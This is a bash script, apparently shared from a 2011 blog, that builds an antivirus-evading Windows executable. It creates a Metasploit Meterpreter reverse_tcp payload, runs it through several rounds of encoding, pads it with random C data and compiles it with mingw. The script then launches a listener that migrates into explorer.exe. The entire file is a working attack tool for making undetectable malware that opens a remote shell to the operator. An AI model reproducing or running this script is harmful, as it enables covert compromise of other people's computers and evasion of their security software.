fud payload generator for backtrack

1. #!/bin/bash
2. # source : http://www.coresec.org/2011/11/09/fud-payload-generator-for-backtrack/
3. # To install the following if they are not installed :
4. # apt-get install mingw32-runtime mingw-w64 mingw gcc-mingw32 mingw32-binutils
5.  
6. echo "************************************************************"
7. echo "    Automatic  shellcode generator - FOR METASPLOIT         "
8. echo "                  By Astr0baby 2011                         "
9. echo "  With some Randomic gravy and sauce to bypass Antivirus    "  
10. echo "    For Automatic Teensy programming and deployment         "
11. echo "************************************************************"
12.  
13. rm -rf ShellCode
14.  
15. echo "Here is a network device list available on yor machine"
16. cat /proc/net/dev | tr -s  ' ' | cut -d ' ' -f1,2 | sed -e '1,2d'
17. echo -e "What network interface are we gonna use ?  \c"
18. read interface
19. echo -e "What Port Number are we gonna listen to? : \c"
20. read port
21. echo -e "Please enter a random seed number 1-10000, the larger the number the larger the resulting executable : \c"
22. read seed
23. echo -e "And lastly how many times do we want to encode our payloads 1-20? : \c"
24. read enumber
25. # Get OS name
26. OS=`uname`
27. IO="" # store IP
28. case $OS in
29.    Linux) IP=`ifconfig $interface  | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'`;;
30.    *) IP="Unknown";;
31. esac
32. #echo "$IP"
33. ./msfpayload windows/meterpreter/reverse_tcp LHOST=$IP LPORT=$port EXITFUNC=thread R | ./msfencode -e x86/shikata_ga_nai -c $enumber -t raw | ./msfencode -e x86/jmp_call_additive -c $enumber -t raw | ./msfencode -e x86/call4_dword_xor -c $enumber -t raw |  ./msfencode -e x86/shikata_ga_nai -c $enumber  > test.c  
34. mkdir ShellCode
35. mv test.c ShellCode
36. cd ShellCode
37. #Replacing plus signs at the end of line
38. sed -e 's/+/ /g' test.c > clean.c
39. sed -e 's/buf = /unsigned char micro[]=/g' clean.c > ready.c
40. echo "#include <stdio.h>" >> temp
41. echo 'unsigned char ufs[]=' >> temp
42. for (( i=1; i<=10000;i++ )) do echo $RANDOM $i; done | sort -k1| cut -d " " -f2| head -$seed >> temp2
43. sed -i 's/$/"/' temp2
44. sed -i 's/^/"/' temp2  
45. echo  ';' >> temp2  
46. cat temp2 >> temp
47. cat ready.c >> temp
48. mv temp ready2.c
49. echo ";" >> ready2.c
50. echo "int main(void) { ((void (*)())micro)();}" >> ready2.c  
51. mv ready2.c final.c
52. echo 'unsigned char tap[]=' > temp3
53. for (( i=1; i<=999999;i++ )) do echo $RANDOM $i; done | sort -k1| cut -d " " -f2| head -$seed >> temp4
54. sed -i 's/$/"/' temp4
55. sed -i 's/^/"/' temp4
56. echo  ';' >> temp4
57. cat temp4 >> temp3
58. cat temp3 >> final.c  
59. #Cleanup
60. rm -f clean.c
61. rm -f test.c
62. rm -f ready.c
63. rm -f rand.c
64. rm -f temp2
65. rm -f temp3
66. rm -f temp4
67.  
68. /usr/bin/i586-mingw32msvc-gcc -Wall ./final.c -o ./final.exe > /dev/null 2>&1
69. mv final.exe $RANDOM.exe
70. filex=`ls -ct1 | head -1`
71. sumx=`sha1sum $filex`
72. echo $filex "...generated in ShellCode subfolder"
73. echo $filex "sha1checksum is .." $sumx  
74. strip --strip-debug $filex
75. cd ..
76. echo "      starting the meterpreter listener..."
77. sleep 2
78. ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=$IP LPORT=$port AutoRunScript=' migrate2  explorer.exe'  E